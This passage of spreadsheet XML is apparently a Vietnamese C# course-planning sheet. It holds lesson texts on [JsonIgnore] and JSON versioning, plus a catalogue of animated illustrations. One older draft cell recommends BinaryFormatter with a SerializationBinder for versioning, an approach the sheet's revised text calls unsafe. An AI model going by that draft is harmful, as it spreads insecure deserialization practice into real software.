- Ở bước serialize, cột trái ghi cả hai thuộc tính vào JSON, và dòng `"Password"` bị tô đỏ. Cột phải bỏ qua `Password`, JSON chỉ có `Name`. Hình in ra: trái là `{"Name":"An","Password":"123456"}` kèm thẻ cảnh báo "Lộ mật khẩu"; phải là `{"Name":"An"}` kèm thẻ xanh "Không lộ mật khẩu".
- Ở bước deserialize, cột trái khôi phục `u2` đủ `Name = "An"` và `Password = "123456"`. Cột phải khôi phục `u2.Name = "An"` nhưng `u2.Password = null` (tô đỏ), vì JSON không có mật khẩu. Cuối cùng bảng "Bỏ qua theo từng bộ serializer" liệt kê `[JsonIgnore]`, `[XmlIgnore]` và `[NonSerialized]` (ghi chú đã bị loại bỏ).
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/xu-ly-cac-truong-nonserialized-va-jsonignore/" title="Bỏ qua thuộc tính với [JsonIgnore]" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: `[JsonIgnore]` giúp dữ liệu nhạy cảm không bị ghi ra JSON, nhưng cái giá là khi đọc lại, thuộc tính đó mất và nhận giá trị mặc định. Mỗi bộ serializer có attribute riêng, và `[NonSerialized]` chỉ thuộc về `BinaryFormatter` đã bị loại bỏ.
## Tóm tắt
- Nên bỏ qua dữ liệu nhạy cảm, dữ liệu tạm hoặc tính được, dữ liệu quá lớn và tham chiếu vòng lặp.
- `[JsonIgnore]` (`System.Text.Json.Serialization`) loại thuộc tính khỏi JSON.
- `[XmlIgnore]` (`System.Xml.Serialization`) loại thành viên public khỏi XML.
- Khi đọc lại, thuộc tính bị bỏ qua nhận giá trị mặc định (hoặc giá trị khởi tạo trong lớp).
- `[NonSerialized]` thuộc `BinaryFormatter`, không an toàn và đã bị loại bỏ trong .NET 9, nên không dùng.</t>
        </is>
      </c>
    </row>
    <row r="61" ht="409.6" customHeight="1" s="18">
      <c r="A61" s="10" t="n">
        <v>61</v>
      </c>
      <c r="B61" s="10" t="inlineStr">
        <is>
          <t>6. Lưu trữ Đối tượng với Serialization</t>
        </is>
      </c>
      <c r="C61" s="10" t="inlineStr">
        <is>
          <t>Các Kỹ Thuật Nâng Cao và Thực Tiễn</t>
        </is>
      </c>
      <c r="D61" s="10" t="inlineStr">
        <is>
          <t>Serialization và Versioning của đối tượng</t>
        </is>
      </c>
      <c r="E61" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F61" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G61" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H61" s="10" t="inlineStr">
        <is>
          <t>Thấy điều gì xảy ra khi lớp thay đổi nhưng dữ liệu JSON cũ vẫn còn.</t>
        </is>
      </c>
      <c r="I61" s="10" t="inlineStr">
        <is>
          <t>1 cột, 3 tab</t>
        </is>
      </c>
      <c r="J61" s="10" t="inlineStr">
        <is>
          <t>JSON cũ (v1) bên trái, lớp mới (v2) bên phải; đường nối: thuộc tính khớp (xanh), thuộc tính thừa trong JSON (xám, bị bỏ qua), thuộc tính mới không có dữ liệu (vàng, giá trị mặc định), thuộc tính đổi tên (đỏ, mất dữ liệu).</t>
        </is>
      </c>
      <c r="K61" s="10" t="inlineStr">
        <is>
          <t>H19</t>
        </is>
      </c>
      <c r="L61" s="10" t="inlineStr">
        <is>
          <t>Thêm thuộc tính | Xóa thuộc tính | Đổi tên thuộc tính</t>
        </is>
      </c>
      <c r="M61" s="10" t="inlineStr">
        <is>
          <t>JSON v1: {"Name":"An","Age":20}.
Thêm: v2 có thêm Email → đọc được, Email = null.
Xóa: v2 bỏ Age → "Age" trong JSON bị bỏ qua, không lỗi.
Đổi tên: v2 đổi Name thành FullName → FullName = null (mất dữ liệu).
Sửa: [JsonPropertyName("Name")] trên FullName → đọc đúng "An".
Xong.</t>
        </is>
      </c>
      <c r="N61" s="10" t="inlineStr">
        <is>
          <t>JSON v1 cố định</t>
        </is>
      </c>
      <c r="O61" s="10" t="inlineStr">
        <is>
          <t>Thêm thuộc tính thường an toàn; đổi tên phải giữ tên cũ trong JSON bằng [JsonPropertyName].</t>
        </is>
      </c>
      <c r="P61" s="10" t="inlineStr">
        <is>
          <t>Mặc định System.Text.Json bỏ qua thuộc tính lạ; từ .NET 8 có thể bắt lỗi bằng JsonUnmappedMemberHandling.Disallow.</t>
        </is>
      </c>
      <c r="Q61" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/serialization-va-versioning-cua-doi-tuong/index.html</t>
        </is>
      </c>
      <c r="R61" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/serialization-va-versioning-cua-doi-tuong/</t>
        </is>
      </c>
      <c r="S61" s="10" t="n"/>
      <c r="T61" s="12" t="n"/>
      <c r="U61" s="12" t="n"/>
      <c r="V61" s="21" t="inlineStr">
        <is>
          <t>Quản lý phiên bản (Versioning) trong Serialization
Khi phát triển ứng dụng thực tế, cấu trúc lớp (class) của bạn hiếm khi giữ nguyên mãi mãi. Bạn thường xuyên phải thêm thuộc tính mới, thay đổi kiểu dữ liệu hoặc đổi tên trường để đáp ứng yêu cầu kinh doanh. Tuy nhiên, thách thức nảy sinh khi bạn cố gắng khôi phục (deserialize) dữ liệu đã được lưu từ phiên bản cũ của ứng dụng vào phiên bản mới. Đây chính là lúc Serialization Versioning trở nên quan trọng.
Vấn đề: Sự không tương thích giữa cũ và mới
Giả sử bạn có một lớp PlayerProfile đã lưu vào file binary. Sau một bản cập nhật, bạn thêm thuộc tính ExperiencePoints. Nếu quá trình deserialization không được quản lý đúng cách, ứng dụng của bạn có thể gặp lỗi SerializationException hoặc tệ hơn là làm hỏng dữ liệu (data corruption) do cấu trúc đối tượng không khớp với dữ liệu đã lưu.
Lưu ý: Việc quản lý phiên bản không chỉ là kỹ thuật, đó là chiến lược để bảo đảm trải nghiệm người dùng không bị gián đoạn (ví dụ: người chơi không bị mất tiến trình khi game cập nhật phiên bản mới).
Sử dụng SerializationBinder để kiểm soát phiên bản
Trong .NET, SerializationBinder là một lớp mạnh mẽ cho phép bạn kiểm soát quá trình load đối tượng. Nó cho phép bạn "lừa" trình deserializer bằng cách thay đổi kiểu dữ liệu (type) được tải vào hệ thống.
Ví dụ, nếu bạn đổi tên lớp GameUser thành Player sau khi đã lưu hàng ngàn file dữ liệu, SerializationBinder sẽ giúp ánh xạ kiểu cũ vào kiểu mới:
public class VersionBinder : SerializationBinder
{
    public override Type BindToType(string assemblyName, string typeName)
    {
        if (typeName.EndsWith("GameUser"))
        {
            return typeof(Player); // Ánh xạ từ kiểu cũ sang kiểu mới
        }
        return null;
    }
}
Bằng cách gắn binder này vào BinaryFormatter, bạn có thể duy trì tính tương thích ngược một cách dễ dàng mà không làm mất dữ liệu của người dùng.
Các chiến lược xử lý khi thay đổi thuộc tính
Thay vì để hệ thống tự động gán giá trị mặc định khi gặp trường mới hoặc bỏ qua trường cũ, bạn nên chủ động kiểm soát quá trình này:
Sử dụng các phương thức Hook (Serialization Callbacks):
Bạn có thể dùng các thuộc tính như [OnDeserializing] hoặc [OnDeserialized] để chạy code ngay sau khi quá trình đọc dữ liệu hoàn tất. Đây là vị trí lý tưởng để gán các giá trị mặc định cho những trường mới thêm vào.
[Serializable]
public class Settings
{
    public string Theme;
    // Trường mới thêm vào sau này
    public int FontSize { get; set; }
    [OnDeserialized]
    internal void OnDeserializedMethod(StreamingContext context)
    {
        // Kiểm tra nếu dữ liệu cũ chưa có FontSize thì gán mặc định
        if (FontSize == 0)
        {
            FontSize = 12;
        }
    }
}
Cung cấp giá trị mặc định (Default Values):
Luôn thiết lập giá trị mặc định cho các thuộc tính mới trong phương thức khởi tạo của lớp. Khi một file cũ được nạp, thuộc tính mới sẽ giữ nguyên giá trị mặc định đó nếu nó không có trong tệp dữ liệu serialized.
Nguyên tắc vàng để tránh rắc rối về phiên bản
Để hạn chế tối đa các vấn đề phát sinh khi thay đổi cấu trúc dữ liệu, bạn nên tuân thủ các quy tắc sau:
Hạn chế thay đổi kiểu dữ liệu của các trường đã tồn tại: Nếu đã lưu thuộc tính Id dưới dạng int, đừng thay đổi nó thành string trừ khi bạn đã chuẩn bị sẵn cơ chế chuyển đổi dữ liệu phức tạp.
Không bao giờ xóa bỏ trường cũ ngay lập tức: Thay vì xóa một thuộc tính, hãy đánh dấu nó là lỗi thời ([Obsolete]) và để nó tồn tại trong class để tránh lỗi khi đọc file cũ.
Sử dụng DataContract: Nếu bạn dùng DataContractSerializer, hãy tận dụng thuộc tính [DataMember(Name="...", IsRequired=false)]. Việc đặt IsRequired=false cho phép deserializer bỏ qua các trường bị thiếu mà không gây ra ngoại lệ, giúp việc cập nhật cấu trúc dữ liệu trở nên uyển chuyển hơn rất nhiều.
Việc quản lý phiên bản đối tượng là một kỹ năng cần sự tỉ mỉ. Khi bạn nắm vững cách kiểm soát cấu trúc dữ liệu qua thời gian, ứng dụng của bạn sẽ trở nên chuyên nghiệp và ổn định hơn, giảm thiểu các lỗi liên quan đến file lưu trữ mà người dùng thường gặp phải khi cập nhật phiên bản.</t>
        </is>
      </c>
      <c r="W61" s="22" t="inlineStr">
        <is>
          <t># Serialization và Versioning của đối tượng
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Giải thích **versioning** (quản lý phiên bản) trong serialization là gì và vì sao cần.
- Dự đoán điều xảy ra khi lớp thêm hoặc xóa một thuộc tính mà JSON cũ vẫn còn.
- Nhận ra việc đổi tên thuộc tính làm mất dữ liệu mà không báo lỗi.
- Dùng `[JsonPropertyName]` để giữ tên cũ trong JSON.
- Nêu vài nguyên tắc an toàn khi thay đổi lớp đã lưu dữ liệu.
- Quan sát ba kiểu thay đổi lớp (thêm, xóa, đổi tên) bằng hoạt động mô phỏng.
## Vấn đề: lớp đổi nhưng dữ liệu cũ vẫn còn
Ứng dụng thật hiếm khi giữ nguyên cấu trúc lớp mãi. Bạn sẽ thêm thuộc tính, bỏ bớt, hoặc đổi tên. Nhưng người dùng vẫn còn **dữ liệu cũ** đã lưu bằng phiên bản trước (tệp JSON, cơ sở dữ liệu...). Khi phiên bản mới đọc dữ liệu cũ đó, điều gì xảy ra? Đó là vấn đề **versioning**.
Trong bài này, ta gọi lớp cũ là **v1** và lớp mới là **v2**. Dữ liệu JSON v1 đã lưu là:
```json
{"Name":"An","Age":20}
```
Với `System.Text.Json`, kết quả phụ thuộc vào kiểu thay đổi.
## Ba kiểu thay đổi
### 1. Thêm thuộc tính: thường an toàn
Lớp v2 thêm `Email`, nhưng JSON cũ chưa có khóa `"Email"`:
```csharp
using System;
using System.Text.Json;
public class User   // v2
{
    public string Name { get; set; }
    public int Age { get; set; }
    public string? Email { get; set; }   // thuộc tính mới
}
public class Program
{
    public static void Main()
    {
        string json = "{\"Name\":\"An\",\"Age\":20}";   // dữ liệu v1
        User u = JsonSerializer.Deserialize&lt;User&gt;(json)!;
        Console.WriteLine(u.Email is null);   // True
    }
}
```
`Name` và `Age` khớp nên được gán. `Email` không có dữ liệu nên giữ **giá trị mặc định** (`null`). Không có lỗi nào. Muốn có giá trị mặc định hợp lý hơn, gán ngay trong lớp, ví dụ `public string? Email { get; set; } = "";`.
### 2. Xóa thuộc tính: khóa thừa bị bỏ qua
Lớp v2 bỏ `Age`, nhưng JSON cũ vẫn có `"Age"`:
```csharp
public class User   // v2: chỉ còn Name
{
    public string Name { get; set; }
}
// json = {"Name":"An","Age":20}
// User u = JsonSerializer.Deserialize&lt;User&gt;(json)!;
// Console.WriteLine(u.Name);   // An
```
`Name` được gán. Khóa `"Age"` không có thuộc tính nào nhận, nên bị **bỏ qua**, không có lỗi. Dữ liệu `Age` chỉ đơn giản bị bỏ lại. Nếu muốn nghiêm ngặt hơn, từ .NET 8 có thể đặt `UnmappedMemberHandling = JsonUnmappedMemberHandling.Disallow` trong `JsonSerializerOptions` để gặp khóa lạ thì ném `JsonException`.
### 3. Đổi tên thuộc tính: dễ mất dữ liệu nhất
Lớp v2 đổi `Name` thành `FullName`, nhưng JSON cũ vẫn dùng khóa `"Name"`:
```csharp
public class User   // v2: đổi tên
{
    public string FullName { get; set; }
    public int Age { get; set; }
}
// json = {"Name":"An","Age":20}
// u.FullName là null: khóa "Name" không khớp thuộc tính nào, bị bỏ qua
// u.Age là 20
```
Khóa `"Name"` không khớp `FullName` nên bị bỏ qua, và `FullName` là `null`. Tên "An" vẫn nằm trong JSON nhưng không ai đọc, và **không có lỗi nào báo cho ta**.
Cách sửa: dùng `[JsonPropertyName]` để chỉ rõ tên khóa trong JSON, giữ nguyên tên cũ:
```csharp
using System.Text.Json.Serialization;
public class User   // v2: đổi tên và giữ khóa cũ
{
    [JsonPropertyName("Name")]
    public string FullName { get; set; }
    public int Age { get; set; }
}
// u.FullName là "An", đọc đúng từ khóa "Name" cũ
```
Thuộc tính trong C# có tên mới, nhưng trong JSON vẫn là `"Name"`, nên dữ liệu cũ và mới đều dùng được.
## Nguyên tắc an toàn
- **Thêm thuộc tính mới** là cách đổi an toàn nhất. Hãy đặt giá trị mặc định hợp lý.
- **Đừng xóa hay đổi tên vội.** Nếu phải đổi tên, giữ tên cũ trong JSON bằng `[JsonPropertyName]`.
- **Hạn chế đổi kiểu của thuộc tính đã lưu.** Ví dụ `Id` đã lưu là số thì đừng đổi thành chuỗi mà không có cách chuyển đổi dữ liệu cũ.
- **Có thể thêm trường phiên bản**, ví dụ `Version`, vào dữ liệu để chương trình biết đang đọc bản nào.
&gt; **Lưu ý:** tài liệu cũ về versioning thường dạy `SerializationBinder`, `[OnDeserialized]` kèm `BinaryFormatter`. Cơ chế này không an toàn và `BinaryFormatter` đã bị loại bỏ trong .NET 9, nên bài này không dùng. Với JSON, các cách trên (giá trị mặc định, `[JsonPropertyName]`, thêm thuộc tính thay vì đổi) là đủ cho người mới.
## Hoạt động: Lớp đổi, JSON cũ vẫn còn
Mô phỏng dưới đây luôn dùng cùng JSON cũ (v1) có `Name = "An"` và `Age = 20`, và đọc nó vào lớp v2. Cột trái là JSON cũ, cột phải là bảng thuộc tính của lớp v2. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Thêm thuộc tính**. Lớp v2 thêm `Email`. `Name` và `Age` khớp (màu xanh), còn `Email` ghi "(không có)" vì JSON không có khóa này và nhận `null` (màu vàng, "mặc định"). Dòng `Console.WriteLine(u.Email is null)` in `True`. Không có lỗi.
- Chuyển sang tab **Xóa thuộc tính**. Lớp v2 chỉ còn `Name`. `Name` khớp, nhận "An". Khóa `"Age": 20` trong JSON được đánh dấu "thừa, bỏ qua", kết quả "bỏ qua". Chương trình in `An` bình thường.
- Mở tab **Đổi tên thuộc tính**. Lớp v2 đổi `Name` thành `FullName`. Khóa `"Name"` không khớp, bị tô đỏ "mất dữ liệu", `FullName` ra `null` nên in một dòng trống. `Age` vẫn khớp (`20`). Ở bước sửa, bỏ dấu `//` trước `[JsonPropertyName("Name")]`: `FullName` đọc từ khóa cũ `"Name"` và in `An`.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/luu-tru-doi-tuong-voi-serialization/cac-ky-thuat-nang-cao-va-thuc-tien/serialization-va-versioning-cua-doi-tuong/" title="Versioning của đối tượng" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: thêm thuộc tính thường an toàn, xóa thuộc tính chỉ làm khóa cũ bị bỏ qua, còn đổi tên làm mất dữ liệu mà không có lỗi. Khi đổi tên, hãy giữ tên cũ trong JSON bằng `[JsonPropertyName]`.
## Tóm tắt
- **Versioning** là việc lớp mới (v2) đọc dữ liệu đã lưu bằng lớp cũ (v1).
- Thêm thuộc tính: thuộc tính mới nhận giá trị mặc định, không lỗi.
- Xóa thuộc tính: khóa thừa trong JSON bị bỏ qua (có thể bắt lỗi bằng `JsonUnmappedMemberHandling.Disallow` từ .NET 8).
- Đổi tên thuộc tính: dữ liệu cũ bị mất mà không báo lỗi; dùng `[JsonPropertyName("tênCũ")]` để sửa.
- Ưu tiên thêm thay vì xóa hoặc đổi, và không dùng `BinaryFormatter`, `SerializationBinder` cho code mới.</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:U61"/>
  <conditionalFormatting sqref="F2:F61">
    <cfRule type="expression" priority="1" dxfId="2">
      <formula>$F2="Nên làm"</formula>
    </cfRule>
    <cfRule type="expression" priority="2" dxfId="1">
      <formula>$F2="Làm thêm nếu muốn"</formula>
    </cfRule>
    <cfRule type="expression" priority="3" dxfId="0">
      <formula>$F2="Không cần"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="2">
    <dataValidation sqref="T2:T61" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"OK,Sửa,Bỏ"</formula1>
    </dataValidation>
    <dataValidation sqref="F2:F61" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="0" type="list">
      <formula1>"Nên làm,Làm thêm nếu muốn,Không cần"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7" customWidth="1" style="18" min="1" max="1"/>
    <col width="30" customWidth="1" style="18" min="2" max="2"/>
    <col width="90" customWidth="1" style="18" min="3" max="3"/>
    <col width="30" customWidth="1" style="18" min="4" max="4"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="14" t="inlineStr">
        <is>
          <t>Mã</t>
        </is>
      </c>
      <c r="B1" s="14" t="inlineStr">
        <is>
          <t>Thành phần hình minh họa</t>
        </is>
      </c>
      <c r="C1" s="14" t="inlineStr">
        <is>
          <t>Mô tả hình và chuyển động</t>
        </is>
      </c>
      <c r="D1" s="14" t="inlineStr">
        <is>
          <t>Dùng ở STT</t>
        </is>
      </c>
    </row>
    <row r="2" ht="28" customHeight="1" s="18">
      <c r="A2" s="15" t="inlineStr">
        <is>
          <t>H01</t>
        </is>
      </c>
      <c r="B2" s="10" t="inlineStr">
        <is>
          <t>Dãy ô List&lt;T&gt;</t>
        </is>
      </c>
      <c r="C2" s="10" t="inlineStr">
        <is>
          <t>Hàng ô có chỉ số bên dưới; ô đã dùng nền đặc, ô dự phòng (Capacity) viền nét đứt; nhãn Count và Capacity. Khi Insert/Remove, các ô phía sau trượt sang phải/trái (mũi tên dịch chỉ số), ô mới nền vàng, ô bị xóa mờ dần.</t>
        </is>
      </c>
      <c r="D2" s="10" t="inlineStr">
        <is>
          <t>1, 2, 3, 4, 5, 6, 7, 11, 35, 47</t>
        </is>
      </c>
    </row>
    <row r="3" ht="28" customHeight="1" s="18">
      <c r="A3" s="15" t="inlineStr">
        <is>
          <t>H02</t>
        </is>
      </c>
      <c r="B3" s="10" t="inlineStr">
        <is>
          <t>Tủ ngăn khóa – giá trị</t>
        </is>
      </c>
      <c r="C3" s="10" t="inlineStr">
        <is>
          <t>Mỗi phần tử Dictionary là một ngăn kéo có nhãn khóa ở mặt trước và giá trị bên trong. Tra cứu: mũi tên đi thẳng tới ngăn; ngăn mới trượt vào (xanh), ngăn cập nhật nháy vàng, ngăn bị xóa mờ đỏ.</t>
        </is>
      </c>
      <c r="D3" s="10" t="inlineStr">
        <is>
          <t>7, 8, 9, 10, 11, 39, 53</t>
        </is>
      </c>
    </row>
    <row r="4" ht="42" customHeight="1" s="18">
      <c r="A4" s="15" t="inlineStr">
        <is>
          <t>H03</t>
        </is>
      </c>
      <c r="B4" s="10" t="inlineStr">
        <is>
          <t>Thẻ Exception</t>
        </is>
      </c>
      <c r="C4" s="10" t="inlineStr">
        <is>
          <t>Thẻ viền đỏ: biểu tượng cảnh báo, tên loại (FormatException...), thông điệp thật của .NET, dòng code gây lỗi, một dòng 'Cách phòng tránh'. Dùng thống nhất cho mọi bài về lỗi.</t>
        </is>
      </c>
      <c r="D4" s="10" t="inlineStr">
        <is>
          <t>1, 3, 6, 8, 12, 13, 14, 15, 16, 17, 18, 20, 21, 24, 25, 28, 41, 42, 43, 53, 57</t>
        </is>
      </c>
    </row>
    <row r="5" ht="28" customHeight="1" s="18">
      <c r="A5" s="15" t="inlineStr">
        <is>
          <t>H04</t>
        </is>
      </c>
      <c r="B5" s="10" t="inlineStr">
        <is>
          <t>Sơ đồ luồng try / catch / finally</t>
        </is>
      </c>
      <c r="C5" s="10" t="inlineStr">
        <is>
          <t>Các khối chữ nhật try, catch, finally, 'sau khối' nối bằng mũi tên. Đường đi thực tế được tô (xanh: bình thường, đỏ: nhánh lỗi). Dòng code bị bỏ qua trong try hiện mờ kèm nhãn 'không chạy'.</t>
        </is>
      </c>
      <c r="D5" s="10" t="inlineStr">
        <is>
          <t>15, 19, 20, 23, 29, 44</t>
        </is>
      </c>
    </row>
    <row r="6" ht="28" customHeight="1" s="18">
      <c r="A6" s="15" t="inlineStr">
        <is>
          <t>H05</t>
        </is>
      </c>
      <c r="B6" s="10" t="inlineStr">
        <is>
          <t>Bộ lọc catch xếp dọc</t>
        </is>
      </c>
      <c r="C6" s="10" t="inlineStr">
        <is>
          <t>Các catch xếp chồng như những cửa lọc. Exception (viên đỏ) rơi từ trên xuống: cửa không khớp hiện ✗ xám, cửa khớp hiện ✓ xanh và mở ra; các cửa phía dưới không được xét.</t>
        </is>
      </c>
      <c r="D6" s="10" t="inlineStr">
        <is>
          <t>17, 18</t>
        </is>
      </c>
    </row>
    <row r="7" ht="28" customHeight="1" s="18">
      <c r="A7" s="15" t="inlineStr">
        <is>
          <t>H06</t>
        </is>
      </c>
      <c r="B7" s="10" t="inlineStr">
        <is>
          <t>Cây phân cấp lớp</t>
        </is>
      </c>
      <c r="C7" s="10" t="inlineStr">
        <is>
          <t>Cây thụt lề hoặc sơ đồ nút: Exception → SystemException → ... Khi so khớp, tô đường đi từ lớp con lên lớp cha để thấy quan hệ 'là một'. Nút mới (exception tự tạo) được vẽ thêm dần.</t>
        </is>
      </c>
      <c r="D7" s="10" t="inlineStr">
        <is>
          <t>18, 25, 43</t>
        </is>
      </c>
    </row>
    <row r="8" ht="28" customHeight="1" s="18">
      <c r="A8" s="15" t="inlineStr">
        <is>
          <t>H07</t>
        </is>
      </c>
      <c r="B8" s="10" t="inlineStr">
        <is>
          <t>Ngăn xếp lời gọi (call stack)</t>
        </is>
      </c>
      <c r="C8" s="10" t="inlineStr">
        <is>
          <t>Các khung hàm chồng lên nhau (Main ở đáy). Exception là quả bóng đỏ đi lên từng khung; khung không có catch phù hợp bị đóng lại (mờ), khung có catch bắt lấy (viền xanh).</t>
        </is>
      </c>
      <c r="D8" s="10" t="inlineStr">
        <is>
          <t>16, 21, 25, 28</t>
        </is>
      </c>
    </row>
    <row r="9" ht="28" customHeight="1" s="18">
      <c r="A9" s="15" t="inlineStr">
        <is>
          <t>H08</t>
        </is>
      </c>
      <c r="B9" s="10" t="inlineStr">
        <is>
          <t>Tài nguyên có trạng thái + bộ đếm</t>
        </is>
      </c>
      <c r="C9" s="10" t="inlineStr">
        <is>
          <t>Biểu tượng tệp/kết nối với đèn trạng thái (Đóng xám, Đang mở xanh, Rò rỉ đỏ) và bộ đếm 'Đang mở: n'. Dùng để thấy tài nguyên có được giải phóng hay không.</t>
        </is>
      </c>
      <c r="D9" s="10" t="inlineStr">
        <is>
          <t>20, 22, 23, 32</t>
        </is>
      </c>
    </row>
    <row r="10" ht="28" customHeight="1" s="18">
      <c r="A10" s="15" t="inlineStr">
        <is>
          <t>H09</t>
        </is>
      </c>
      <c r="B10" s="10" t="inlineStr">
        <is>
          <t>Đèn kiểm tra / băng chuyền</t>
        </is>
      </c>
      <c r="C10" s="10" t="inlineStr">
        <is>
          <t>Dải trạm kiểm tra nằm ngang; mỗi trạm là một đèn: xanh khi đạt, đỏ khi trượt, các trạm sau tắt. Biến thể băng chuyền: 'kiện hàng' dữ liệu đi qua từng trạm xử lý.</t>
        </is>
      </c>
      <c r="D10" s="10" t="inlineStr">
        <is>
          <t>13, 26, 27, 29, 50, 51</t>
        </is>
      </c>
    </row>
    <row r="11" ht="28" customHeight="1" s="18">
      <c r="A11" s="15" t="inlineStr">
        <is>
          <t>H10</t>
        </is>
      </c>
      <c r="B11" s="10" t="inlineStr">
        <is>
          <t>RAM và Ổ đĩa</t>
        </is>
      </c>
      <c r="C11" s="10" t="inlineStr">
        <is>
          <t>Hai khung hình: 'Bộ nhớ chương trình (RAM)' và 'Ổ đĩa' có biểu tượng tệp. Nút trạng thái chương trình: Đang chạy → Đã tắt (RAM xóa trắng) → Chạy lại.</t>
        </is>
      </c>
      <c r="D11" s="10" t="inlineStr">
        <is>
          <t>30, 54</t>
        </is>
      </c>
    </row>
    <row r="12" ht="28" customHeight="1" s="18">
      <c r="A12" s="15" t="inlineStr">
        <is>
          <t>H11</t>
        </is>
      </c>
      <c r="B12" s="10" t="inlineStr">
        <is>
          <t>Ống dẫn Stream</t>
        </is>
      </c>
      <c r="C12" s="10" t="inlineStr">
        <is>
          <t>Ống nằm ngang nối Tệp và Chương trình; từng byte (ô nhỏ ghi ký tự + mã số) chảy qua ống; con trỏ Position chạy trên dải byte của tệp; nhãn Length.</t>
        </is>
      </c>
      <c r="D12" s="10" t="inlineStr">
        <is>
          <t>31, 33, 56</t>
        </is>
      </c>
    </row>
    <row r="13" ht="28" customHeight="1" s="18">
      <c r="A13" s="15" t="inlineStr">
        <is>
          <t>H12</t>
        </is>
      </c>
      <c r="B13" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp</t>
        </is>
      </c>
      <c r="C13" s="10" t="inlineStr">
        <is>
          <t>Khung giống Notepad: số dòng, nội dung, ký hiệu ↵ cho xuống dòng; con trỏ đọc ▶ hoặc con trỏ ghi |; chế độ 'trước / sau' đặt cạnh nhau, dòng mới tô xanh, dòng bị ghi đè gạch ngang.</t>
        </is>
      </c>
      <c r="D13" s="10" t="inlineStr">
        <is>
          <t>30, 32, 33, 34, 35, 36, 37, 38, 39, 47, 49, 51</t>
        </is>
      </c>
    </row>
    <row r="14" ht="28" customHeight="1" s="18">
      <c r="A14" s="15" t="inlineStr">
        <is>
          <t>H13</t>
        </is>
      </c>
      <c r="B14" s="10" t="inlineStr">
        <is>
          <t>Bộ đệm (buffer)</t>
        </is>
      </c>
      <c r="C14" s="10" t="inlineStr">
        <is>
          <t>Ba khối Chương trình → Bộ đệm → Tệp trên đĩa. Bộ đệm là hộp có vạch đầy dần; khi Flush/Close, nội dung 'đổ' xuống tệp và kích thước tệp tăng.</t>
        </is>
      </c>
      <c r="D14" s="10" t="inlineStr">
        <is>
          <t>37</t>
        </is>
      </c>
    </row>
    <row r="15" ht="28" customHeight="1" s="18">
      <c r="A15" s="15" t="inlineStr">
        <is>
          <t>H14</t>
        </is>
      </c>
      <c r="B15" s="10" t="inlineStr">
        <is>
          <t>Chip đường dẫn</t>
        </is>
      </c>
      <c r="C15" s="10" t="inlineStr">
        <is>
          <t>Đường dẫn tách thành các chip: ổ đĩa | thư mục | thư mục | tên tệp | phần mở rộng. Mỗi phương thức của Path tô sáng các chip mà nó trả về.</t>
        </is>
      </c>
      <c r="D15" s="10" t="inlineStr">
        <is>
          <t>40</t>
        </is>
      </c>
    </row>
    <row r="16" ht="28" customHeight="1" s="18">
      <c r="A16" s="15" t="inlineStr">
        <is>
          <t>H15</t>
        </is>
      </c>
      <c r="B16" s="10" t="inlineStr">
        <is>
          <t>Cây thư mục</t>
        </is>
      </c>
      <c r="C16" s="10" t="inlineStr">
        <is>
          <t>Cây có biểu tượng thư mục/tệp và thụt lề; nút mới tạo tô xanh, nút bị xóa mờ đỏ, nút được liệt kê viền vàng, vị trí gây lỗi gắn biểu tượng ổ khóa hoặc dấu chấm than.</t>
        </is>
      </c>
      <c r="D16" s="10" t="inlineStr">
        <is>
          <t>41, 42, 43, 44</t>
        </is>
      </c>
    </row>
    <row r="17" ht="28" customHeight="1" s="18">
      <c r="A17" s="15" t="inlineStr">
        <is>
          <t>H16</t>
        </is>
      </c>
      <c r="B17" s="10" t="inlineStr">
        <is>
          <t>Bảng tính ↔ văn bản CSV</t>
        </is>
      </c>
      <c r="C17" s="10" t="inlineStr">
        <is>
          <t>Trái: lưới ô kiểu Excel (hàng tiêu đề đậm). Phải: văn bản CSV thô. Mỗi bước tô cùng màu một hàng ở hai bên; dấu phẩy được tô như đường kẻ ô.</t>
        </is>
      </c>
      <c r="D17" s="10" t="inlineStr">
        <is>
          <t>45, 46</t>
        </is>
      </c>
    </row>
    <row r="18" ht="28" customHeight="1" s="18">
      <c r="A18" s="15" t="inlineStr">
        <is>
          <t>H17</t>
        </is>
      </c>
      <c r="B18" s="10" t="inlineStr">
        <is>
          <t>Dây chuyền dòng ↔ đối tượng</t>
        </is>
      </c>
      <c r="C18" s="10" t="inlineStr">
        <is>
          <t>Dây chuyền ngang: dòng văn bản → Split/Join → mảng ô → chuyển kiểu → thẻ đối tượng → List. Mỗi bản ghi lần lượt đi qua từng trạm.</t>
        </is>
      </c>
      <c r="D18" s="10" t="inlineStr">
        <is>
          <t>5, 47, 48, 49, 50, 52, 53</t>
        </is>
      </c>
    </row>
    <row r="19" ht="28" customHeight="1" s="18">
      <c r="A19" s="15" t="inlineStr">
        <is>
          <t>H18</t>
        </is>
      </c>
      <c r="B19" s="10" t="inlineStr">
        <is>
          <t>Bộ phân tích theo trạng thái</t>
        </is>
      </c>
      <c r="C19" s="10" t="inlineStr">
        <is>
